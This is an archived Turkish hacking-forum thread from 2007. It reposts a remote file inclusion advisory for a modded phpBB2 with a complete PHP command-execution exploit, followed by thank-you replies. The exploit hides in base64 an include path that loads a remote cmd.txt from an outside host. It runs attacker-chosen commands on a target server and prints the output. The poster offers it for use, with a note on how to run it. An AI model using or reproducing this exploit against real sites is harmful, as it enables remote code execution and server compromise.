PDA

Orijinalini görmek için tıklayınız

eXTReMe Tracker
: Extreme PHPBB2 Remote File Inclusion


SekoMirza
04-20-2007, 01:30 PM
Kaynak : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..

Hello,,

FullyModdedphpBB2 Remote File Inclusion .. With exploit :)

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : Sitedeki Linkleri Sadece Üyelerimiz Görebilir..
Email Address : security (at) soqor (dot) net [email concealed]

/* Script info
## Mod Title: FullyModdedphpBB2
## Description: A fully modded phpBB
*/

Remote File Include:
subscp.php?phpbb_root_path=Sitedeki Linkleri Sadece Üyelerimiz Görebilir..

Exploit:
<?php
/************************************************/
/* Fully Moded PHPBB2 Command Execution Exploit */
/* By : HACKERS PAL <security (at) soqor (dot) net [email concealed]> */
/* Website : Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. */
/************************************************/

error_reporting(0);
ini_set("max_execution_time",0);
Function get_page($url){if(function_exists("file_get_contents")){$contents=file_g
et_contents($url);}else{$fp=fopen("$url","r");while($line=fread($fp,1024
)){$contents=$contents.$line;}}return$contents;}
Echo "<body bgcolor=\"#000000\" text=\"#00FF00\">\n<title>Fully Moded PHPBB2 Command Execution Exploit by : HACKERS PAL :: Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. ::</title>\n\r"."<h2>Fully Moded PHPBB2 Command Execution\n\r"."<h3>By : HACKERS PAL [security (at) soqor (dot) net [email concealed]]\n\r"."<h3>VisiT My Website [<a href=\"Sitedeki Linkleri Sadece Üyelerimiz Görebilir..">Sitedeki Linkleri Sadece Üyelerimiz Görebilir..>]\n\r";
$expl=base64_decode("c3Vic2NwLnBocD9waHBiYl9yb290X3BhdGg9aHR0cDovL3BzZX Z
pbC5nb29nbGVwYWdlcy5jb20vY21kLnR4dD8=");
$action=$_GET['action'];
if($action == "")
{
echo "<form action=\"$PHP_SELF?action=2\" method=\"post\">\n Web URL -- Example : Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. <br> <input type=\"text\" name=\"url\" style=\"width:250\">\n <br> <br>\n Command : <br> <textarea name=\"query\" cols=\"70\" rows=\"5\"></textarea>\n <br>\n <br> <div align=\"center\">\n <input type=\"submit\"> </div>\n </form>\n ";
}
else
{
$exploit=$_POST['url']."/".$expl."&cmd=".$_POST['query'];

$page=get_page($exploit);
if(!eregi("hacking attempt",$page))
{
Echo "<h1> Command Successfully executed .. Result is</h1> $page <br> Thanks For Using This exploit .. Have Fun :)<br><br><br>";

}

}
die(base64_decode("PGRpdiBhbGlnbj0iY2VudGVyIj4KPGZvbnQgY29sb3I9IiNGRj AwM
DAiPgpHPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cjwvZm9 udD48Zm9udCBjb2xvcj0iI
zAwODAwMCI+RUU8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5 0PC9mb250Pjxmb250IGNvb
G9yPSIjRkYwMDAwIj5aPC9mb250Pjxmb250IGNvbG9yPSJ3aGl 0ZSI+CjoKPC9mb250Pgo8Z
m9udCBjb2xvcj0iI0ZGMDAwMCI+CkQ8L2ZvbnQ+PGZvbnQgY29 sb3I9IndoaXRlIj5ldmk8L
2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiPkw8L2ZvbnQ+PGZ vbnQgY29sb3I9IndoaXRlI
j4tPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4wMDwvZm9 udD48Zm9udCBjb2xvcj0id
2hpdGUiPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDA iPk08L2ZvbnQ+PGZvbnQgY
29sb3I9IndoaXRlIj5vPC9mb250Pjxmb250IGNvbG9yPSIjMDA 4MDAwIj5oQTwvZm9udD48Z
m9udCBjb2xvcj0id2hpdGUiPmphPC9mb250Pjxmb250IGNvbG9 yPSIjRkYwMDAwIj5saSA8L
2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkZGRkZGIj4sPC9mb250Pjx mb250IGNvbG9yPSIjRkYwM
DAwIj4KRDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPnIuPC9 mb250Pjxmb250IGNvbG9yP
SIjMDA4MDAwIj5FPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI +eDwvZm9udD48Zm9udCBjb
2xvcj0iI0ZGMDAwMCI+RTwvZm9udD48Zm9udCBjb2xvcj0id2h pdGU
iPgosCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwMDAiPgpHP C9mb250Pjxmb250IGNvbG9
yPSJ3aGl0ZSI+YUNrZTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGM DAwMCI+UjwvZm9udD48Zm9
udCBjb2xvcj0id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb 3I9IiNGRjAwMDAiPlM8L2Z
vbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5wPC9mb250Pjxmb250I GNvbG9yPSIjMDA4MDAwIj4
xZDwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPmU8L2ZvbnQ+P GZvbnQgY29sb3I9IiNGRjA
wMDAiPlI8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5fPC9mb 250Pjxmb250IGNvbG9yPSI
jRkYwMDAwIj5OPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+Z XQgLAo8L2ZvbnQ+Cjxmb25
0IGNvbG9yPSIjRkYwMDAwIj5CPC9mb250Pjxmb250IGNvbG9yP SJ3aGl0ZSI+bGFjawo8L2Z
vbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5BPC9mb250Pjxmb 250IGNvbG9yPSJ3aGl0ZSI
+dHRhQzwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+azwvZ m9udD48Zm9udCBjb2xvcj0
id2hpdGUiPiAsCjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjAwM DAiPk08L2ZvbnQ+PGZvbnQ
gY29sb3I9IndoaXRlIj5pbmk8L2ZvbnQ+PGZvbnQgY29sb3I9I iNGRjAwMDAiPk08L2ZvbnQ
+PGZvbnQgY29sb3I9IndoaXRlIj5hPC9mb250Pjxmb250IGNvb G9yPSIjMDA4MDAwIj5uPC9
mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ICwKPC9mb250Pgo8Z m9u
dCBjb2xvcj0iI0ZGMDAwMCI+SjwvZm9udD48Zm9udCBjb2xvcj 0id2hpdGUiPmE8L2ZvbnQ+
PGZvbnQgY29sb3I9IiMwMDgwMDAiPnJlPC9mb250Pjxmb250IG NvbG9yPSJ3aGl0ZSI+ZTwv
Zm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+SDwvZm9udD48Zm 9udCBjb2xvcj0id2hpdGUi
Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KQjwvZm9udD48Zm9udC Bjb2xvcj0id2hpdGUiPmE8
L2ZvbnQ+PC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIj5naD wvZm9udD48Zm9udCBjb2xv
cj0id2hpdGUiPmRhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMD AwIj5EPC9mb250Pjxmb250
IGNvbG9yPSIjRkZGRkZGIj4KLCA8L2ZvbnQ+PGZvbnQgY29sb3 I9IiNGRjAwMDAiPkQ8L2Zv
bnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPnIgPC9mb250Pgo8Zm 9udCBjb2xvcj0iI0ZGMDAw
MCI+SDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+YTwvZm 9udD48Zm9udCBjb2xvcj0i
IzAwODAwMCI+Y2s8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRk YiPmU8L2ZvbnQ+PGZvbnQg
Y29sb3I9IiNGRjAwMDAiPnI8L2ZvbnQ+PGZvbnQgY29sb3I9Ii NGRkZGRkYiPgosPC9mb250
Pjxmb250IGNvbG9yPSJ3aGl0ZSI+PGJyPgo8L2ZvbnQ+Cjxmb2 50IGNvbG9yPSIjRkYwMDAw
Ij5TPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+cDwvZm9udD 48Zm9udCBjb2xvcj0iIzAw
ODAwMCI+ZWM8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5pYT wvZ
m9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+bCBHPC9mb250Pjx mb250IGNvbG9yPSJ3aGl0Z
SI+cjwvZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCI+RUU8L2Z vbnQ+PGZvbnQgY29sb3I9I
ndoaXRlIj50PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj5 aPC9mb250Pjxmb250IGNvb
G9yPSJ3aGl0ZSI+CjwvZm9udD4KPGZvbnQgY29sb3I9IiNGRjA wMDAiPkY8L2ZvbnQ+PGZvb
nQgY29sb3I9IndoaXRlIj5vciA6CjwvZm9udD4KPGZvbnQgY29 sb3I9IiNGRjAwMDAiPlM8L
2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5vPC9mb250Pjxmb25 0IGNvbG9yPSIjMDA4MDAwI
j5RPC9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+bzwvZm9udD4 8Zm9udCBjb2xvcj0iI0ZGM
DAwMCI+UjwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPi48L2Z vbnQ+PGZvbnQgY29sb3I9I
iNGRjAwMDAiPk48L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5 lPC9mb250Pjxmb250IGNvb
G9yPSIjRkYwMDAwIj5UPC9mb250Pjxmb250IGNvbG9yPSJ3aGl 0ZSI+CjwvZm9udD4KPGZvb
nQgY29sb3I9IiNGRjAwMDAiPlQ8L2ZvbnQ+PGZvbnQgY29sb3I 9IndoaXRlIj5lYTwvZm9ud
D48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+TTwvZm9udD48Zm9udCB jb2xvcj0id2hpdGUiPgo8L
2ZvbnQ+Cjxmb250IGNvbG9yPSIjRkYwMDAwIj5BPC9mb250Pjx mb250IGNvbG9yPSJ3aGl0Z
SI+bjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+RDwvZm9 udD
48Zm9udCBjb2xvcj0id2hpdGUiPgo8L2ZvbnQ+Cjxmb250IGNv bG9yPSIjRkYwMDAwIj5NPC
9mb250Pjxmb250IGNvbG9yPSJ3aGl0ZSI+ZTwvZm9udD48Zm9u dCBjb2xvcj0iIzAwODAwMC
I+bWI8L2ZvbnQ+PGZvbnQgY29sb3I9IndoaXRlIj5lcjwvZm9u dD48Zm9udCBjb2xvcj0iI0
ZGMDAwMCI+UzwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPjsK PC9mb250Pgo8L2I+Cjxicj
48YnI+CjxhIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmUi IGhyZWY9Im1haWx0bzpzZW
N1cml0eUBzb3Fvci5uZXQiPgo8Zm9udCBjb2xvcj0iI0ZGMDAw MCI+UzwvZm9udD48Zm9udC
Bjb2xvcj0iI0ZGRkZGRiI+ZTwvZm9udD48Zm9udCBjb2xvcj0i I0ZGMDAwMCI+QzwvZm9udD
48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+dTwvZm9udD48Zm9udCBj b2xvcj0iI0ZGMDAwMCI+Uj
wvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+aTwvZm9udD48 Zm9udCBjb2xvcj0iI0ZGMD
AwMCI+VDwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+eTwv Zm9udD48Zm9udCBjb2xvcj
0iIzAwODAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+W0FU XTwvZm9udD48Zm9udCBjb2
xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+ UzwvZm9udD48Zm9udCBjb2
xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+ bzwvZm9udD48Zm9udCBjb2
xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+ UTw
vZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZ GFuYSIgc2l6ZT0iMiI+bzw
vZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZ GFuYSIgc2l6ZT0iMiI+Ujw
vZm9udD48Zm9udCBjb2xvcj0iIzAwODAwMCIgZmFjZT0iVmVyZ GFuYSIgc2l6ZT0iMiI+W0R
vVF08L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9I lZlcmRhbmEiIHNpemU9IjI
iPk48L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiIGZhY2U9I lZlcmRhbmEiIHNpemU9IjI
iPmU8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9I lZlcmRhbmEiIHNpemU9IjI
iPlQ8L2ZvbnQ+PC9hPgo8YnI+CjxhIGhyZWY9Imh0dHA6Ly93d 3cuc29xb3IubmV0IiBzdHl
sZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyI+PGZvbnQgY29sb 3I9IiNGRjAwMDAiPlc8L2Z
vbnQ+PGZvbnQgY29sb3I9IiNGRkZGRkYiPnc8L2ZvbnQ+PGZvb nQgY29sb3I9IiNGRjAwMDA
iPlc8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDgwMDAiIGZhY2U9I lZlcmRhbmEiIHNpemU9IjI
iPltEb1RdPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmY WNlPSJWZXJkYW5hIiBzaXp
lPSIyIj5TPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIiBmY WNlPSJWZXJkYW5hIiBzaXp
lPSIyIj5vPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmY WNlPSJWZXJkYW5hIiBzaXp
lPSIyIj5RPC9mb250Pjxmb250IGNvbG9yPSIjRkZGRkZGIiBmY WNl
PSJWZXJkYW5hIiBzaXplPSIyIj5vPC9mb250Pjxmb250IGNvbG 9yPSIjRkYwMDAwIiBmYWNl
PSJWZXJkYW5hIiBzaXplPSIyIj5SPC9mb250Pjxmb250IGNvbG 9yPSIjMDA4MDAwIiBmYWNl
PSJWZXJkYW5hIiBzaXplPSIyIj5bRG9UXTwvZm9udD48Zm9udC Bjb2xvcj0iI0ZGMDAwMCIg
ZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+TjwvZm9udD48Zm9udC Bjb2xvcj0iI0ZGRkZGRiIg
ZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+ZTwvZm9udD48Zm9udC Bjb2xvcj0iI0ZGMDAwMCIg
ZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+VDwvZm9udD48L2E+Cj wvZGl2Pgo8L2JvZHk+"));

?>


Not: Exploit Php dilinde kodlanmıştır. Exploiti çalıştırmadan önce php exploit derleme konusunu inceleyin lütfen

WebLOADER
04-20-2007, 01:39 PM
Teşekkür ederim bilgiler için

0wn3d
04-20-2007, 01:41 PM
Sağolasın ;)

SekoMirza
04-20-2007, 01:53 PM
Eyvallah. Sizde Sağolun ..

ozancem
04-21-2007, 03:18 PM
teşekkürler

@ntis@pık
04-22-2007, 04:47 PM
emeğe saygı

soldiers_of_God
04-24-2007, 04:11 PM
paylasim için tesekkurler..

Bestworm
04-29-2007, 09:58 PM
Sağol Seko

klineci
09-12-2007, 07:37 PM
emege saygi parmaklarına saglik kardesim:D:D